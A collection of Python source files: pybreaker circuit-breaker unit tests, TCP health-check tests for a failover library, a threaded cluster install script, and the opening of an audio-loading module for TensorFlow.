self.assertEqual((), self.breaker.listeners)
self.assertEqual('memory', self.breaker._state_storage.name)
def test_fail_max_setter(self):
"""CircuitBreaker: it should allow the user to set a new value for
'fail_max'.
"""
self.assertEqual(5, self.breaker.fail_max)
self.breaker.fail_max = 10
self.assertEqual(10, self.breaker.fail_max)
def test_reset_timeout_setter(self):
"""CircuitBreaker: it should allow the user to set a new value for
'reset_timeout'.
"""
self.assertEqual(60, self.breaker.reset_timeout)
self.breaker.reset_timeout = 30
self.assertEqual(30, self.breaker.reset_timeout)
def test_call_with_no_args(self):
"""CircuitBreaker: it should be able to invoke functions with no-args.
"""
def func(): return True
self.assertTrue(self.breaker.call(func))
def test_call_with_args(self):
"""CircuitBreaker: it should be able to invoke functions with args.
"""
def func(arg1, arg2): return [arg1, arg2]
self.assertEqual([42, 'abc'], self.breaker.call(func, 42, 'abc'))
def test_call_with_kwargs(self):
"""CircuitBreaker: it should be able to invoke functions with kwargs.
"""
def func(**kwargs): return kwargs
self.assertEqual({'a':1, 'b':2}, self.breaker.call(func, a=1, b=2))
@testing.gen_test
def test_call_async_with_no_args(self):
"""CircuitBreaker: it should be able to invoke async functions with no-args.
"""
@gen.coroutine
def func(): return True
ret = yield self.breaker.call(func)
self.assertTrue(ret)
@testing.gen_test
def test_call_async_with_args(self):
"""CircuitBreaker: it should be able to invoke async functions with args.
"""
@gen.coroutine
def func(arg1, arg2): return [arg1, arg2]
ret = yield self.breaker.call(func, 42, 'abc')
self.assertEqual([42, 'abc'], ret)
@testing.gen_test
def test_call_async_with_kwargs(self):
"""CircuitBreaker: it should be able to invoke async functions with kwargs.
"""
@gen.coroutine
def func(**kwargs): return kwargs
ret = yield self.breaker.call(func, a=1, b=2)
self.assertEqual({'a':1, 'b':2}, ret)
def test_add_listener(self):
"""CircuitBreaker: it should allow the user to add a listener at a
later time.
"""
self.assertEqual((), self.breaker.listeners)
first = CircuitBreakerListener()
self.breaker.add_listener(first)
self.assertEqual((first,), self.breaker.listeners)
second = CircuitBreakerListener()
self.breaker.add_listener(second)
self.assertEqual((first, second), self.breaker.listeners)
def test_add_listeners(self):
"""CircuitBreaker: it should allow the user to add listeners at a
later time.
"""
first, second = CircuitBreakerListener(), CircuitBreakerListener()
self.breaker.add_listeners(first, second)
self.assertEqual((first, second), self.breaker.listeners)
def test_remove_listener(self):
"""CircuitBreaker: it should allow the user to remove a listener.
"""
first = CircuitBreakerListener()
self.breaker.add_listener(first)
self.assertEqual((first,), self.breaker.listeners)
self.breaker.remove_listener(first)
self.assertEqual((), self.breaker.listeners)
def test_excluded_exceptions(self):
"""CircuitBreaker: it should ignore specific exceptions.
"""
self.breaker = CircuitBreaker(exclude=[LookupError])
def err_1(): raise NotImplementedError()
def err_2(): raise LookupError()
def err_3(): raise KeyError()
self.assertRaises(NotImplementedError, self.breaker.call, err_1)
self.assertEqual(1, self.breaker.fail_counter)
# LookupError is not considered a system error
self.assertRaises(LookupError, self.breaker.call, err_2)
self.assertEqual(0, self.breaker.fail_counter)
self.assertRaises(NotImplementedError, self.breaker.call, err_1)
self.assertEqual(1, self.breaker.fail_counter)
# Should consider subclasses as well (KeyError is a subclass of
# LookupError)
self.assertRaises(KeyError, self.breaker.call, err_3)
self.assertEqual(0, self.breaker.fail_counter)
def test_excluded_callable_exceptions(self):
"""CircuitBreaker: it should ignore specific exceptions that return true from a filtering callable.
"""
class TestException(Exception):
def __init__(self, value):
self.value = value
filter_function = lambda e: type(e) == TestException and e.value == 'good'
self.breaker = CircuitBreaker(exclude=[filter_function])
def err_1(): raise TestException("bad")
def err_2(): raise TestException("good")
def err_3(): raise NotImplementedError()
self.assertRaises(TestException, self.breaker.call, err_1)
self.assertEqual(1, self.breaker.fail_counter)
self.assertRaises(TestException, self.breaker.call, err_2)
self.assertEqual(0, self.breaker.fail_counter)
self.assertRaises(NotImplementedError, self.breaker.call, err_3)
self.assertEqual(1, self.breaker.fail_counter)
def test_excluded_callable_and_types_exceptions(self):
"""CircuitBreaker: it should allow a mix of exclusions that includes both filter functions and types.
"""
class TestException(Exception):
def __init__(self, value):
self.value = value
filter_function = lambda e: type(e) == TestException and e.value == 'good'
self.breaker = CircuitBreaker(exclude=[filter_function, LookupError])
def err_1(): raise TestException("bad")
def err_2(): raise TestException("good")
def err_3(): raise NotImplementedError()
def err_4(): raise LookupError()
self.assertRaises(TestException, self.breaker.call, err_1)
self.assertEqual(1, self.breaker.fail_counter)
self.assertRaises(TestException, self.breaker.call, err_2)
self.assertEqual(0, self.breaker.fail_counter)
self.assertRaises(NotImplementedError, self.breaker.call, err_3)
self.assertEqual(1, self.breaker.fail_counter)
self.assertRaises(LookupError, self.breaker.call, err_4)
self.assertEqual(0, self.breaker.fail_counter)
def test_add_excluded_exception(self):
"""CircuitBreaker: it should allow the user to exclude an exception at a
later time.
"""
self.assertEqual((), self.breaker.excluded_exceptions)
self.breaker.add_excluded_exception(NotImplementedError)
self.assertEqual((NotImplementedError,), \
self.breaker.excluded_exceptions)
self.breaker.add_excluded_exception(Exception)
self.assertEqual((NotImplementedError, Exception), \
self.breaker.excluded_exceptions)
def test_add_excluded_exceptions(self):
"""CircuitBreaker: it should allow the user to exclude exceptions at a
later time.
"""
self.breaker.add_excluded_exceptions(NotImplementedError, Exception)
self.assertEqual((NotImplementedError, Exception), \
self.breaker.excluded_exceptions)
def test_remove_excluded_exception(self):
"""CircuitBreaker: it should allow the user to remove an excluded
exception.
"""
self.breaker.add_excluded_exception(NotImplementedError)
self.assertEqual((NotImplementedError,), \
self.breaker.excluded_exceptions)
self.breaker.remove_excluded_exception(NotImplementedError)
self.assertEqual((), self.breaker.excluded_exceptions)
def test_decorator(self):
"""CircuitBreaker: it should be a decorator.
"""
@self.breaker
def suc(value):
"Docstring"
return value
@self.breaker
def err(value):
"Docstring"
raise NotImplementedError()
self.assertEqual('Docstring', suc.__doc__)
self.assertEqual('Docstring', err.__doc__)
self.assertEqual('suc', suc.__name__)
self.assertEqual('err', err.__name__)
self.assertRaises(NotImplementedError, err, True)
self.assertEqual(1, self.breaker.fail_counter)
self.assertTrue(suc(True))
self.assertEqual(0, self.breaker.fail_counter)
@testing.gen_test
def test_decorator_call_future(self):
"""CircuitBreaker: it should be a decorator.
"""
@self.breaker(__pybreaker_call_async=True)
@gen.coroutine
def suc(value):
"Docstring"
raise gen.Return(value)
@self.breaker(__pybreaker_call_async=True)
@gen.coroutine
def err(value):
"Docstring"
raise NotImplementedError()
self.assertEqual('Docstring', suc.__doc__)
self.assertEqual('Docstring', err.__doc__)
self.assertEqual('suc', suc.__name__)
self.assertEqual('err', err.__name__)
with self.assertRaises(NotImplementedError):
yield err(True)
self.assertEqual(1, self.breaker.fail_counter)
ret = yield suc(True)
self.assertTrue(ret)
self.assertEqual(0, self.breaker.fail_counter)
@mock.patch('pybreaker.HAS_TORNADO_SUPPORT', False)
def test_no_tornado_raises(self):
with self.assertRaises(ImportError):
def func(): return True
self.breaker(func, __pybreaker_call_async=True)
def test_name(self):
"""CircuitBreaker: it should allow an optional name to be set and
retrieved.
"""
name = "test_breaker"
self.breaker = CircuitBreaker(name=name)
self.assertEqual(self.breaker.name, name)
name = "breaker_test"
self.breaker.name = name
self.assertEqual(self.breaker.name, name)
class CircuitBreakerTestCase(testing.AsyncTestCase, CircuitBreakerStorageBasedTestCase, CircuitBreakerConfigurationTestCase):
"""
Tests for the CircuitBreaker class.
"""
def setUp(self):
super(CircuitBreakerTestCase, self).setUp()
self.breaker_kwargs = {}
self.breaker = CircuitBreaker()
def test_create_new_state__bad_state(self):
with self.assertRaises(ValueError):
self.breaker._create_new_state('foo')
@mock.patch('pybreaker.CircuitOpenState')
def test_notify_not_called_on_init(self, open_state):
storage = CircuitMemoryStorage('open')
breaker = CircuitBreaker(state_storage=storage)
open_state.assert_called_once_with(breaker, prev_state=None, notify=False)
@mock.patch('pybreaker.CircuitOpenState')
def test_notify_called_on_state_change(self, open_state):
storage = CircuitMemoryStorage('closed')
breaker = CircuitBreaker(state_storage=storage)
prev_state = breaker.state
breaker.state = 'open'
open_state.assert_called_once_with(breaker, prev_state=prev_state, notify=True)
def test_failure_count_not_reset_during_creation(self):
for state in (STATE_OPEN, STATE_CLOSED, STATE_HALF_OPEN):
storage = CircuitMemoryStorage(state)
storage.increment_counter()
breaker = CircuitBreaker(state_storage=storage)
self.assertEqual(breaker.state.name, state)
self.assertEqual(breaker.fail_counter, 1)
def test_state_opened_at_not_reset_during_creation(self):
for state in (STATE_OPEN, STATE_CLOSED, STATE_HALF_OPEN):
storage = CircuitMemoryStorage(state)
now = datetime.now()
storage.opened_at = now
breaker = CircuitBreaker(state_storage=storage)
self.assertEqual(breaker.state.name, state)
self.assertEqual(storage.opened_at, now)
import fakeredis
import logging
from redis.exceptions import RedisError
class CircuitBreakerRedisTestCase(unittest.TestCase, CircuitBreakerStorageBasedTestCase):
"""
Tests for the CircuitBreaker class.
"""
def setUp(self):
self.redis = fakeredis.FakeStrictRedis()
self.breaker_kwargs = {'state_storage': CircuitRedisStorage('closed', self.redis)}
self.breaker = CircuitBreaker(**self.breaker_kwargs)
def tearDown(self):
self.redis.flushall()
def test_namespace(self):
self.redis.flushall()
self.breaker_kwargs = {'state_storage': CircuitRedisStorage('closed', self.redis, namespace='my_app')}
self.breaker = CircuitBreaker(**self.breaker_kwargs)
def func(): raise NotImplementedError()
self.assertRaises(NotImplementedError, self.breaker.call, func)
keys = self.redis.keys()
self.assertEqual(2, len(keys))
self.assertTrue(keys[0].decode('utf-8').startswith('my_app'))
self.assertTrue(keys[1].decode('utf-8').startswith('my_app'))
def test_fallback_state(self):
logger = logging.getLogger('pybreaker')
logger.setLevel(logging.FATAL)
self.breaker_kwargs = {'state_storage': CircuitRedisStorage('closed', self.redis, fallback_circuit_state='open')}
self.breaker = CircuitBreaker(**self.breaker_kwargs)
def func(k): raise RedisError()
with mock.patch.object(self.redis, 'get', new=func):
state = self.breaker.state
self.assertEqual('open', state.name)
def test_missing_state(self):
"""CircuitBreakerRedis: If state on Redis is missing, it should set the
fallback circuit state and reset the fail counter to 0.
"""
self.breaker_kwargs = {'state_storage': CircuitRedisStorage('closed', self.redis, fallback_circuit_state='open')}
self.breaker = CircuitBreaker(**self.breaker_kwargs)
def func(): raise NotImplementedError()
self.assertRaises(NotImplementedError, self.breaker.call, func)
self.assertEqual(1, self.breaker.fail_counter)
with mock.patch.object(self.redis, 'get', new=lambda k: None):
state = self.breaker.state
self.assertEqual('open', state.name)
self.assertEqual(0, self.breaker.fail_counter)
import threading
from types import MethodType
class CircuitBreakerThreadsTestCase(unittest.TestCase):
"""
Tests to reproduce common synchronization errors on the CircuitBreaker class.
"""
def setUp(self):
self.breaker = CircuitBreaker(fail_max=3000, reset_timeout=1)
def _start_threads(self, target, n):
"""
Starts `n` threads that call `target` and waits for them to finish.
"""
threads = [threading.Thread(target=target) for i in range(n)]
[t.start() for t in threads]
[t.join() for t in threads]
def _mock_function(self, obj, func):
"""
Replaces a bound method on `self.breaker` with another.
"""
setattr(obj, func.__name__, MethodType(func, self.breaker))
def test_fail_thread_safety(self):
"""CircuitBreaker: it should compute a failed call atomically to
avoid race conditions.
"""
# Create a specific exception to avoid masking other errors
class SpecificException(Exception):
pass
@self.breaker
def err(): raise SpecificException()
def trigger_error():
for n in range(500):
try: err()
except SpecificException: pass
def _inc_counter(self):
c = self._state_storage._fail_counter
sleep(0.00005)
self._state_storage._fail_counter = c + 1
self._mock_function(self.breaker, _inc_counter)
self._start_threads(trigger_error, 3)
self.assertEqual(1500, self.breaker.fail_counter)
def test_success_thread_safety(self):
"""CircuitBreaker: it should compute a successful call atomically
to avoid race conditions.
"""
@self.breaker
def suc(): return True
def trigger_success():
for n in range(500):
suc()
class SuccessListener(CircuitBreakerListener):
def success(self, cb):
c = 0
if hasattr(cb, '_success_counter'):
c = cb._success_counter
sleep(0.00005)
cb._success_counter = c + 1
self.breaker.add_listener(SuccessListener())
self._start_threads(trigger_success, 3)
self.assertEqual(1500, self.breaker._success_counter)
def test_half_open_thread_safety(self):
"""CircuitBreaker: it should allow only one trial call when the
circuit is half-open.
"""
self.breaker = CircuitBreaker(fail_max=1, reset_timeout=0.01)
self.breaker.open()
sleep(0.01)
@self.breaker
def err(): raise Exception()
def trigger_failure():
try: err()
except: pass
class StateListener(CircuitBreakerListener):
def __init__(self):
self._count = 0
def before_call(self, cb, fun, *args, **kwargs):
sleep(0.00005)
def state_change(self, cb, old_state, new_state):
if new_state.name == 'half-open':
self._count += 1
state_listener = StateListener()
self.breaker.add_listener(state_listener)
self._start_threads(trigger_failure, 5)
self.assertEqual(1, state_listener._count)
def test_fail_max_thread_safety(self):
"""CircuitBreaker: it should not allow more failed calls than
'fail_max' setting.
"""
@self.breaker
def err(): raise Exception()
def trigger_error():
for i in range(2000):
try: err()
except: pass
class SleepListener(CircuitBreakerListener):
def before_call(self, cb, func, *args, **kwargs):
sleep(0.00005)
self.breaker.add_listener(SleepListener())
self._start_threads(trigger_error, 3)
self.assertEqual(self.breaker.fail_max, self.breaker.fail_counter)
class CircuitBreakerRedisConcurrencyTestCase(unittest.TestCase):
"""
Tests to reproduce common concurrency issues between different machines
connecting to Redis. This is simulated locally using threads.
"""
def setUp(self):
self.redis = fakeredis.FakeStrictRedis()
self.breaker_kwargs = {'fail_max': 3000, 'reset_timeout': 1,'state_storage': CircuitRedisStorage('closed', self.redis)}
self.breaker = CircuitBreaker(**self.breaker_kwargs)
def tearDown(self):
self.redis.flushall()
def _start_threads(self, target, n):
"""
Starts `n` threads that call `target` and waits for them to finish.
"""
threads = [threading.Thread(target=target) for i in range(n)]
[t.start() for t in threads]
[t.join() for t in threads]
def _mock_function(self, obj, func):
"""
Replaces a bound method on `self.breaker` with another.
"""
setattr(obj, func.__name__, MethodType(func, self.breaker))
def test_fail_thread_safety(self):
"""CircuitBreaker: it should compute a failed call atomically to
avoid race conditions.
"""
# Create a specific exception to avoid masking other errors
class SpecificException(Exception):
pass
@self.breaker
def err(): raise SpecificException()
def trigger_error():
for n in range(500):
try: err()
except SpecificException: pass
def _inc_counter(self):
sleep(0.00005)
self._state_storage.increment_counter()
self._mock_function(self.breaker, _inc_counter)
self._start_threads(trigger_error, 3)
self.assertEqual(1500, self.breaker.fail_counter)
def test_success_thread_safety(self):
"""CircuitBreaker: it should compute a successful call atomically
to avoid race conditions.
"""
@self.breaker
def suc(): return True
def trigger_success():
for n in range(500):
suc()
class SuccessListener(CircuitBreakerListener):
def success(self, cb):
c = 0
if hasattr(cb, '_success_counter'):
c = cb._success_counter
sleep(0.00005)
cb._success_counter = c + 1
self.breaker.add_listener(SuccessListener())
self._start_threads(trigger_success, 3)
self.assertEqual(1500, self.breaker._success_counter)
def test_half_open_thread_safety(self):
"""CircuitBreaker: it should allow only one trial call when the
circuit is half-open.
"""
self.breaker = CircuitBreaker(fail_max=1, reset_timeout=0.01)
self.breaker.open()
sleep(0.01)
@self.breaker
def err(): raise Exception()
def trigger_failure():
try: err()
except: pass
class StateListener(CircuitBreakerListener):
def __init__(self):
self._count = 0
def before_call(self, cb, fun, *args, **kwargs):
sleep(0.00005)
def state_change(self, cb, old_state, new_state):
if new_state.name == 'half-open':
self._count += 1
state_listener = StateListener()
self.breaker.add_listener(state_listener)
self._start_threads(trigger_failure, 5)
self.assertEqual(1, state_listener._count)
def test_fail_max_thread_safety(self):
"""CircuitBreaker: it should not allow more failed calls than 'fail_max'
setting. Note that with Redis, where we have separate systems
incrementing the counter, we can get concurrent updates such that the
counter is greater than the 'fail_max' by the number of systems. To
prevent this, we'd need to take out a lock amongst all systems before
trying the call.
"""
@self.breaker
def err(): raise Exception()
def trigger_error():
for i in range(2000):
try: err()
except: pass
class SleepListener(CircuitBreakerListener):
def before_call(self, cb, func, *args, **kwargs):
sleep(0.00005)
self.breaker.add_listener(SleepListener())
num_threads = 3
self._start_threads(trigger_error, num_threads)
self.assertTrue(self.breaker.fail_counter < self.breaker.fail_max + num_threads)
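
# A minimal sketch (not exercised by the tests above) of how a shared, Redis-backed
# breaker might be wired up in application code. It relies on the same
# CircuitBreaker/CircuitRedisStorage API used in these tests, with a real Redis
# client in place of fakeredis; `call_remote_service` is just a placeholder.
def _example_shared_breaker(redis_client):
    storage = CircuitRedisStorage('closed', redis_client)
    breaker = CircuitBreaker(fail_max=5, reset_timeout=30, state_storage=storage)

    @breaker
    def call_remote_service():
        # Replace with a real network call; every process sharing `redis_client`
        # sees the same failure counter and open/closed state.
        raise NotImplementedError

    return breaker, call_remote_service
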
if __name__ == "__main__":
unittest.main()
|
tcp_test.py
|
from __future__ import absolute_import, print_function
import failover
import logging
from select import select
from six.moves.http_client import (
HTTPConnection, INTERNAL_SERVER_ERROR, NOT_FOUND, OK, SERVICE_UNAVAILABLE)
from socket import (
AF_INET, create_connection, INADDR_ANY, SOCK_STREAM, socket, SOL_SOCKET,
SO_REUSEADDR)
from sys import stderr
from threading import Thread, Condition
from time import sleep
from unittest import TestCase, main
from .server import create_server, start_server, stop_server
LOOPBACK = "127.0.0.1"
UNROUTABLE = "192.0.2.1" # RFC 5737 -- TEST-NET-1 space, unroutable globally
log = logging.getLogger("test.tcp")
class TCPService(Thread):
def __init__(self, *args, **kw):
super(TCPService, self).__init__(*args, **kw)
self.lock = Condition()
self.socket = socket(AF_INET, SOCK_STREAM)
self.socket.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
self.socket.bind((LOOPBACK, 0))
self.socket.listen(5)
self.port = self.socket.getsockname()[1]
self.timeout = 0.1
self.exit_requested = False
log.info("Created server on port %d", self.port)
return
def close(self):
log.info("Closing server on port %d", self.port)
with self.lock:
if self.socket is not None:
self.socket.close()
self.socket = None
self.lock.notify()
return
def listen(self):
log.info("Activating server on port %d", self.port)
with self.lock:
if self.socket is None:
self.socket = socket(AF_INET, SOCK_STREAM)
self.socket.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
self.socket.bind((LOOPBACK, self.port))
self.socket.listen(5)
self.lock.notify()
return
def run(self):
import time
my_sleep = time.sleep
self.lock.acquire()
try:
while not self.exit_requested:
log.debug("Allowing other thread to signal us")
try:
self.lock.wait(0.1)
except RuntimeError:
pass
if self.socket:
log.debug("Waiting for connection")
result = select([self.socket], [], [], self.timeout)
if result[0]:
log.debug("Healthy -- received connection")
conn, client = self.socket.accept()
log.debug("discarding data from %s:%d", client[0], client[1])
self.discard(conn)
else:
log.debug("Healthy -- no connection")
else:
self.lock.release()
try:
log.debug("Unhealthy -- ignoring connection")
my_sleep(self.timeout)
finally:
self.lock.acquire()
except Exception as e:
log.error("YIKES", exc_info=True)
finally:
self.lock.release()
log.debug("Exiting")
return
def discard(self, connection):
"""
Read and discard all received data on a connection.
"""
def do_discard():
while True:
data = connection.recv(1024)
if len(data) == 0:
connection.close()
break
thread = Thread(target=do_discard)
thread.start()
return
class CheckTCPServiceTest(TestCase):
def start_service(self):
service = TCPService()
service.start()
return service
def setUp(self):
logging.basicConfig(
stream=stderr, level=logging.DEBUG,
format=("%(asctime)s %(module)s [%(levelname)s] "
"%(filename)s:%(lineno)d: %(message)s"))
def test_basic_connection(self):
service = self.start_service()
checker = failover.TCPCheck(
LOOPBACK, service.port, failover.second(10), name="tcp1")
self.assertTrue(checker())
service.close()
self.assertFalse(checker())
service.listen()
self.assertTrue(checker())
self.assertTrue(checker())
# Check repr
self.assertEqual(repr(checker), "tcp1")
checker.name = None
self.assertTrue(repr(checker).startswith(
"TCPCheck(host='127.0.0.1', port=%d, timeout=" % service.port))
service.exit_requested = True
service.join()
return
def test_unroutable(self):
checker = failover.TCPCheck(
UNROUTABLE, 80, failover.second(0.1))
self.assertFalse(checker())
return
def test_server(self):
service = self.start_service()
server = create_server()
# Make sure we reject invalid component names
try:
server.add_component('/foo', None)
self.fail("Expected ValueError")
except ValueError:
pass
server.add_component(
'always-succeed',
failover.TCPCheck(LOOPBACK, service.port,
failover.second(10)))
# Add another with an integer time value
server.add_component(
'always-succeed2',
failover.TCPCheck(LOOPBACK, service.port, 10))
checker = failover.TCPCheck(
UNROUTABLE, 80, failover.second(0.1))
server.add_component('always-fail', checker)
# Make sure checker got a name
self.assertEqual(repr(checker), "always-fail")
# Add a service-name check
checker = failover.TCPCheck(
UNROUTABLE, "http", failover.second(0.1))
server.add_component('always-fail2', checker)
# Try adding an un-callable object
server.add_component('wrong', 4)
# Run the HTTP server in a separate thread
start_server(server)
try:
# always-succeed should always return ok
con = HTTPConnection(LOOPBACK, server.port)
con.request("GET", "/always-succeed")
response = con.getresponse()
self.assertEqual(response.status, OK)
con.request("GET", "/always-succeed2")
response = con.getresponse()
self.assertEqual(response.status, OK)
# always-fail should always return service unavailable
con.request("GET", "/always-fail")
response = con.getresponse()
self.assertEqual(response.status, SERVICE_UNAVAILABLE)
# HEAD requests should return the same.
con.request("HEAD", "/always-fail")
response = con.getresponse()
self.assertEqual(response.status, SERVICE_UNAVAILABLE)
# A non-existent service should return not found
con.request("GET", "/unknown")
response = con.getresponse()
self.assertEqual(response.status, NOT_FOUND)
# Uncallable service should return 500
con.request("GET", "/wrong")
response = con.getresponse()
self.assertEqual(response.status, INTERNAL_SERVER_ERROR)
finally:
log.info("Exiting TCP server")
service.exit_requested = True
service.join()
log.info("Exiting health check server")
stop_server(server)
return
def test_reject_invalid_hostname(self):
try:
failover.TCPCheck(3.14159, 90, failover.second(1))
self.fail("Expected TypeError")
except TypeError:
pass
def test_reject_invalid_port(self):
for port in [-2, -1, 0, 65536, 131072, "myxlflyx"]:
try:
failover.TCPCheck(LOOPBACK, port, failover.second(1))
self.fail("Expected ValueError")
except ValueError:
pass
try:
failover.TCPCheck(LOOPBACK, None, failover.second(1))
self.fail("Expected TypeError")
except TypeError:
pass
def test_reject_invalid_duration(self):
try:
failover.TCPCheck(LOOPBACK, 80, failover.second(-1))
self.fail("Expected ValueError")
except ValueError:
pass
try:
failover.TCPCheck(LOOPBACK, 80, -1)
self.fail("Expected ValueError")
except ValueError:
pass
try:
failover.TCPCheck(LOOPBACK, 80, -1.5)
self.fail("Expected ValueError")
except ValueError:
pass
try:
failover.TCPCheck(LOOPBACK, 80, failover.count(1))
self.fail("Expected ValueError")
except ValueError:
pass
try:
failover.TCPCheck(LOOPBACK, 80, [1,2,3])
self.fail("Expected TypeError")
except TypeError:
pass
if __name__ == "__main__":
main()
|
new_install.py
|
#!/usr/bin/env python
import sys
sys.path = [".", "lib"] + sys.path
import threading
import queue
import time
import random
import install_utils, install_constants
import logging.config
import os
from membase.api.exception import InstallException
import traceback
logging.config.fileConfig("scripts.logging.conf")
log = logging.getLogger()
q = queue.Queue()
def node_installer(node, install_tasks):
while True:
install_task = install_tasks.get()
if install_task is None:
break
else:
do_install_task(install_task, node)
install_tasks.task_done()
def on_install_error(install_task, node, e):
    # Queue.empty() only reports status; drain the node's remaining tasks so its
    # worker thread does not keep attempting further steps after a failure.
    while not node.queue.empty():
        node.queue.get_nowait()
        node.queue.task_done()
log.error("Error {0}:{1} occurred on {2} during {3}".format(repr(e), e, node.ip, install_task))
def do_install_task(task, node):
try:
if task == "uninstall":
node.uninstall_cb()
elif task == "install":
node.install_cb()
elif task == "init":
node.init_cb()
elif task == "cleanup":
node.cleanup_cb()
log.info("Done with %s on %s." % (task, node.ip))
except Exception as e:
on_install_error(task, node, e)
traceback.print_exc()
def validate_install(params):
log.info("-" * 100)
cluster_nodes = {}
for node in install_utils.NodeHelpers:
version = params["version"]
if node.install_success is None:
node.install_success = False
if params["cluster_version"]:
if node.ip != params["bkrs_client"].ip:
version = params["cluster_version"]
if node.rest:
try:
node_status = node.rest.cluster_status()["nodes"]
except:
continue
for item in node_status:
hostname = item["hostname"]
if "alternateAddresses" in item and "external" in item["alternateAddresses"]:
hostname = item["alternateAddresses"]["external"]["hostname"]
if node.ip not in hostname:
continue
if version in item['version'] and item['status'] == "healthy":
node.install_success = True
                        if node.enable_ipv6 and item.get("addressFamily") != "inet6":
node.install_success = False
afamily = "Unknown"
if 'addressFamily' in list(item.keys()):
afamily = item['addressFamily']
cluster_nodes[node.ip] = {
"hostname": item["hostname"],
"version": item["version"],
"afamily": afamily,
"services": item["services"]
}
# check cluster has correct number of nodes
if params.get("init_clusters", False):
selected_cluster = None
for cluster in params["clusters"].values():
for server in cluster:
if server.ip == node.ip:
selected_cluster = cluster
if selected_cluster is not None:
if len(node_status) != len(selected_cluster):
node.install_success = False
clusters = []
if params.get("init_clusters", False):
for cluster in params["clusters"].values():
nodes = { node.ip: cluster_nodes[node.ip] for node in cluster}
for [ip, node] in nodes.items():
del cluster_nodes[ip]
clusters.append(list(nodes.values()))
for node in cluster_nodes.values():
clusters.append([node])
for [i, cluster] in enumerate(clusters):
for node in cluster:
log.info("cluster:C{0}\tnode:{1}\tversion:{2}\taFamily:{3}\tservices:{4}".format(i + 1, node['hostname'],
node['version'],
node['afamily'],
node['services']))
install_utils.print_result_and_exit()
def do_install(params):
# Per node, spawn one thread, which will process a queue of install tasks
for server in params["servers"]:
node_helper = install_utils.get_node_helper(server.ip)
install_tasks = params["install_tasks"]
q = queue.Queue()
for _ in install_tasks:
q.put(_)
t = threading.Thread(target=node_installer, args=(node_helper, q))
t.daemon = True
t.start()
node_helper.queue = q
node_helper.thread = t
force_stop = start_time + params["timeout"]
for node in install_utils.NodeHelpers:
try:
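            # The while/else below always raises InstallException once the wait loop
            # exits; the handler only treats it as a failure if force_stop has passed.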
while node.queue.unfinished_tasks and time.time() < force_stop:
time.sleep(install_constants.INSTALL_POLL_INTERVAL)
else:
raise InstallException
except InstallException:
if time.time() >= force_stop:
log.error("INSTALL TIMED OUT AFTER {0}s.VALIDATING..".format(params["timeout"]))
break
if "init" in params["install_tasks"]:
if params.get("init_clusters", False) and len(params["clusters"]) > 0:
timeout = force_stop - time.time()
install_utils.init_clusters(timeout)
validate_install(params)
def do_uninstall(params):
# Per node, spawn one thread, which will process a queue of
# uninstall tasks
for server in params["servers"]:
node_helper = install_utils.get_node_helper(server.ip)
install_tasks = ['uninstall']
q = queue.Queue()
for _ in install_tasks:
q.put(_)
t = threading.Thread(target=node_installer,
args=(node_helper, q))
t.daemon = True
t.start()
node_helper.queue = q
node_helper.thread = t
force_stop = start_time + params["timeout"]
for node in install_utils.NodeHelpers:
try:
while node.queue.unfinished_tasks and time.time() < \
force_stop:
time.sleep(install_constants.INSTALL_POLL_INTERVAL)
else:
raise InstallException
except InstallException:
if time.time() >= force_stop:
log.error(
"Uninstall TIMED OUT AFTER {0}s. "
"VALIDATING..".format(
params["timeout"]))
break
def main():
params = install_utils.process_user_input()
install_utils.pre_install_steps()
if 'uninstall' in params['install_tasks']:
# Do uninstallation of products first before downloading the
# builds.
do_uninstall(params)
params['install_tasks'].remove('uninstall')
install_utils.download_build()
do_install(params)
if __name__ == "__main__":
start_time = time.time()
main()
end_time = time.time()
log.info("TOTAL INSTALL TIME = {0} seconds".format(round(end_time - start_time)))
sys.exit(0)
|
audio_reader.py
|
import fnmatch
import os
import random
import re
import threading
import librosa
import numpy as np
import tensorflow as tf
FILE_PATTERN = r'p([0-9]+)_([0-9]+)\.wav'
def get_category_cardinality(files):
id_reg_expression = re.compile(FILE_PATTERN)
min_id = None
max_id = None
for filename in files:
matches = id_reg_expression.findall(filename)[0]
id, recording_id = [int(id_) for id_ in matches]
if min_id is None or id < min_id:
min_id = id
if max_id is None or id > max_id:
max_id = id
return min_id, max_id
def randomize_files(files):
for file in files:
file_index = random.randint(0, (len(files) - 1))
yield files[file_index]
def find_files(directory, pattern='*.mp3'):
'''Recursively finds all files matching the pattern.'''
files = []
for root, dirnames, filenames in os.walk(directory):
for filename in fnmatch.filter(filenames, pattern):
files.append(os.path.join(root, filename))
return files
def load_generic_audio(directory, sample_rate):
'''Generator that yields audio waveforms from the directory.'''
files = find_files(directory)
id_reg_exp = re.compile(FILE_PATTERN)
print("files length: {}".format(len(files)))
randomized_files = randomize_files(files)
for filename in randomized_files:
ids = id_reg_exp.findall(filename)
if not ids:
# The file name does not match the pattern containing ids, so
# there is no id.
category_id = None
else:
# The file name matches the pattern for containing ids.
category_id = int(ids[0][0])
audio, _ = librosa.load(filename, sr=sample_rate, mono=True)
audio = audio.reshape(-1, 1)
yield audio, filename, category_id
def trim_silence(audio, threshold, frame_length=2048):
'''Removes silence at the beginning and end of a sample.'''
if audio.size < frame_length:
frame_length = audio.size
# change from rmse to rms
    energy = librosa.feature.rms(y=audio, frame_length=frame_length)
frames = np.nonzero(energy > threshold)
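    # energy has shape (1, n_frames), so np.nonzero returns (row_idx, frame_idx);
    # frames_to_samples converts both, and [1] picks the non-silent sample positions.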
indices = librosa.core.frames_to_samples(frames)[1]
# Note: indices can be an empty array, if the whole audio was silence.
return audio[indices[0]:indices[-1]] if indices.size else audio[0:0]
def not_all_have_id(files):
''' Return true iff any of the filenames does not conform to the pattern
we require for determining the category id.'''
id_reg_exp = re.compile(FILE_PATTERN)
for file in files:
ids = id_reg_exp.findall(file)
if not ids:
return True
return False
class AudioReader(object):
'''Generic background audio reader that preprocesses audio files
and enqueues them into a TensorFlow queue.'''
def __init__(self,
audio_dir,
coord,
sample_rate,
gc_enabled,
receptive_field,
sample_size=None,
silence_threshold=None,
queue_size=32):
self.audio_dir = audio_dir
self.sample_rate = sample_rate
self.coord = coord
self.sample_size = sample_size
self.receptive_field = receptive_field
self.silence_threshold = silence_threshold
self.gc_enabled = gc_enabled
self.threads = []
self.sample_placeholder = tf.compat.v1.placeholder(dtype=tf.float32, shape=None)
self.queue = tf.queue.PaddingFIFOQueue(queue_size,
['float32'],
shapes=[(None, 1)])
self.enqueue = self.queue.enqueue([self.sample_placeholder])
if self.gc_enabled:
self.id_placeholder = tf.compat.v1.placeholder(dtype=tf.int32, shape=())
